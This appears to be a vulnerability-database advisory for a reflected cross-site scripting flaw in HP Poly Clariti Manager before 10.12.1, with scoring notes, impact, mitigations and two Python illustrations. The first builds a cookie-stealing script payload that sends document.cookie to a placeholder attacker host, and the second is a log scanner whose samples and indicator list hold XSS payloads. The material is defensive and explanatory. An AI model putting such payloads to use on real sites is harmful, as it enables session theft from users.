
CVE-2025-43484: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in HP Inc. Poly Clariti Manager

Severity: Medium

Tags: Vulnerability, CVE-2025-43484, CWE-79
Published: Tue Jul 22 2025 (07/22/2025, 23:16:02 UTC)
Source: CVE Database V5
Vendor/Project: HP Inc.
Product: Poly Clariti Manager

Description

A potential reflected cross-site scripting vulnerability has been identified in the Poly Clariti Manager for versions prior to 10.12.1. The website does not validate or sanitize the user input before rendering it in the response. HP has addressed the issue in the latest software update.

AI-Powered Analysis

Last updated: 07/30/2025, 01:30:45 UTC

Technical Analysis

CVE-2025-43484 is a reflected cross-site scripting (XSS) vulnerability in HP Inc.'s Poly Clariti Manager, affecting versions prior to 10.12.1. It is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation): the product's web interface takes a value supplied in the request and writes it into the HTTP response without validating it or encoding it for the output context. An attacker who can get a victim's browser to send a crafted request therefore has their own markup and script rendered as part of a page served from the Poly Clariti Manager origin, and that script runs with the origin's privileges in the victim's browser. HP has not published the affected endpoint or parameter; the advisory states only that user input is reflected without validation or sanitization.

The CVSS 4.0 base score recorded for the issue is 6.0 (medium), with an adjacent-network attack vector (AV:A), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), high impact on the confidentiality of the vulnerable system (VC:H) and no impact on integrity or availability. Two caveats apply when reading that vector. First, AV:A means the attacker must be able to reach the management interface from an adjacent position such as the same LAN or VPN rather than from the open internet, which matches how these consoles are usually deployed. Second, UI:N does not match the mechanics of reflected XSS: the payload executes only when a user of the interface follows a crafted link or submits a crafted form, so in practice exploitation does depend on a victim action even though the recorded vector scores none. PR:N indicates that the reflecting request can be sent without credentials; the injected script nonetheless inherits whatever session the victim already holds.

Poly Clariti Manager is a management platform for unified communications and collaboration devices and is typically deployed in enterprise networks to administer voice and video endpoints. A successful attack could read session cookies that are not marked HttpOnly, issue requests to the management console as the logged-in user, or present a credential-phishing page under the product's own origin. HP fixed the issue in version 10.12.1. No exploitation in the wild had been reported at the time of analysis.
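The following Python snippet is an added illustration of the flaw class, not code from HP or from Poly Clariti Manager (whose affected endpoint and parameter are not published). It shows a request handler that reflects a query parameter into an HTML page unencoded, the same handler with HTML-entity encoding applied, and the attacker-side link construction that a reflected XSS depends on. The `/search` path, the `q` parameter and the payload are all constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote

# Constructed payload for the example: closes the surrounding context, then
# sends document.cookie to an attacker-controlled host (attacker.example is
# a placeholder, not a real collector).
CONSTRUCTED_PAYLOAD = (
    '"><script>new Image().src='
    '"https://attacker.example/c?"+document.cookie</script>'
)


def attacker_query(payload: str) -> str:
    """Build the query string an attacker embeds in the phishing link.

    The browser sends the payload percent-encoded; the server decodes it back
    into raw HTML before reflecting it, which is the whole problem.
    """
    return "q=" + quote(payload, safe="")


def render_vulnerable(query_string: str) -> str:
    """CWE-79 sink: the 'q' parameter is written straight into the HTML body.

    Hypothetical handler standing in for whatever endpoint in Poly Clariti
    Manager reflected input before 10.12.1.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    term = params.get("q", [""])[0]
    return f"<html><body><p>Results for: {term}</p></body></html>"


def render_hardened(query_string: str) -> str:
    """Same handler with output encoding for the HTML text context.

    html.escape turns < > & " ' into entities, so the browser shows the
    payload as literal text. This is correct only for HTML text and quoted
    attribute contexts; a value placed inside a <script> block, an event
    handler or a URL needs context-specific encoding instead.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    term = params.get("q", [""])[0]
    safe = html.escape(term, quote=True)
    return f"<html><body><p>Results for: {safe}</p></body></html>"


def reflects_script(page: str) -> bool:
    """Crude check: does the response contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    q = attacker_query(CONSTRUCTED_PAYLOAD)
    print("crafted link: https://clariti.example/search?" + q)
    print("vulnerable reflects script:", reflects_script(render_vulnerable(q)))
    print("hardened reflects script:  ", reflects_script(render_hardened(q)))
```

The `reflects_script` check is a string test, not a browser; a real assessment confirms execution in a browser, because encoding that looks safe in one context (the `<p>` body here) can still be exploitable when the same value is also echoed into a script block or attribute elsewhere on the page.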

Potential Impact

For European organizations that rely on Poly unified communications and collaboration infrastructure, this vulnerability is a moderate risk. Because the injected script runs as the victim inside the Poly Clariti Manager web origin, an attacker can read what the victim's session can read and submit what the victim's session is allowed to submit; if the victim is an administrator, that includes viewing and changing device configurations. The vulnerability does not escalate privileges by itself, so its reach is bounded by which users can be lured into the crafted request. The recorded vector scores a high confidentiality impact and no direct integrity or availability impact; actions taken through the hijacked session are the route to indirect integrity effects such as altered device configuration. Reflected XSS requires a victim to follow a crafted link, but no credentials are needed to trigger the reflection, so the attacker's task reduces to phishing an employee who uses the console. Deployments reachable from the general office network or over VPN are the ones the adjacent-network vector describes. Indirect consequences include loss of trust, GDPR exposure if personal data held in the console is disclosed, and operational disruption if a management console is compromised. No exploits were known in the wild at analysis time, which lowers immediate risk without removing it: reflected XSS is usually straightforward to weaponize once the affected parameter is identified, and public disclosure invites that work.

Mitigation Recommendations

European organizations should prioritize updating Poly Clariti Manager to version 10.12.1 or later. That is the only real fix: the missing output encoding lives in the vendor's code and cannot be supplied by an external layer. Until the update is deployed, the most effective interim control is to restrict who can reach the management interface, for example by placing it on a management VLAN or behind a jump host and allowing access only from administrator workstations; this directly narrows the adjacent-network attack vector. Fronting the console with a reverse proxy or Web Application Firewall (WAF) with rules for reflected XSS payloads (script tags, event-handler attributes, javascript: URIs) in query strings and form bodies adds a stopgap, with the caveat that encoding-based evasion is common and bypasses should be expected. Organizations should also confirm that the console's session cookie carries the HttpOnly and Secure flags; HttpOnly defeats the simplest cookie-theft payload, although it does not stop a script that acts within the victim's session.

Shorter session lifetimes and re-authentication for sensitive changes limit what a hijacked session can do. Multi-factor authentication (MFA) at login protects against stolen passwords, but it does not help once an attacker is riding an already-authenticated session, so it should not be counted on against this issue specifically. Security awareness training should tell console users not to follow unsolicited links to internal management tools, including links that appear to point at the correct host, since a reflected XSS link does. Web server or proxy access logs for the console should be reviewed for requests whose query strings contain script tags, event-handler attributes or javascript: URIs after URL decoding, and alerts raised on them. Regular security assessments and penetration testing that include management consoles are recommended so similar issues are found before public disclosure.
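As an added example (not part of the advisory or of HP's tooling), the following Python script shows the log-review step on constructed access-log lines in the common "combined" format: it URL-decodes each request target repeatedly to defeat double encoding, then flags lines whose decoded target carries reflected-XSS indicators. The host, paths, addresses and log lines are invented; the real Poly Clariti Manager endpoint is not named in the advisory, so the `/search` path and `q` parameter are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (Apache/nginx "combined" format); not real traffic.
# Lines 2, 3 and 5 carry XSS payloads; line 3 is double-encoded.
SAMPLE_LOG = """\
10.0.5.23 - - [22/Jul/2025:14:03:11 +0000] "GET /login?user=alice HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.5.88 - - [22/Jul/2025:14:03:40 +0000] "GET /search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.5.88 - - [22/Jul/2025:14:04:02 +0000] "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.5.41 - - [22/Jul/2025:14:05:17 +0000] "GET /devices?page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.5.19 - - [22/Jul/2025:14:06:00 +0000] "GET /search?q=javascript%3Aalert(1) HTTP/1.1" 200 4096 "https://intranet.example/" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Starting-point indicator list; tune for the application's own traffic.
XSS_INDICATORS = (
    "<script", "</script", "javascript:", "onerror=", "onload=",
    "<svg", "<img", "<iframe", "document.cookie",
)


def normalise(target: str) -> str:
    """Percent-decode up to three times (stops early once stable) and lowercase.

    Attackers double-encode to slip past single-pass filters; decoding until
    the string stops changing makes the indicator match see the final form.
    """
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.lower()


def scan_access_log(text: str) -> list[dict]:
    """Return one record per line whose decoded target matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line; skip rather than guess
        decoded = normalise(m["target"])
        matched = [ind for ind in XSS_INDICATORS if ind in decoded]
        if matched:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "decoded": decoded,
                "indicators": matched,
                "status": int(m["status"]),
            })
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["status"]} {h["indicators"]} {h["decoded"]}')
```

A hit shows that a payload reached the server, not that it executed in anyone's browser; a 200 response from the reflecting endpoint plus a source address that belongs to an administrator workstation is the combination worth escalating. Payloads submitted in POST bodies do not appear in the request line, so this scan covers the URL-based case that a phishing link produces.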


Technical Details

Data Version: 5.1
Assigner Short Name: hp
Date Reserved: 2025-04-16T15:25:24.712Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 6880207ca915ff00f7fc9724

Added to database: 7/22/2025, 11:36:28 PM

Last enriched: 7/30/2025, 1:30:45 AM

Last updated: 9/2/2025, 2:55:07 PM

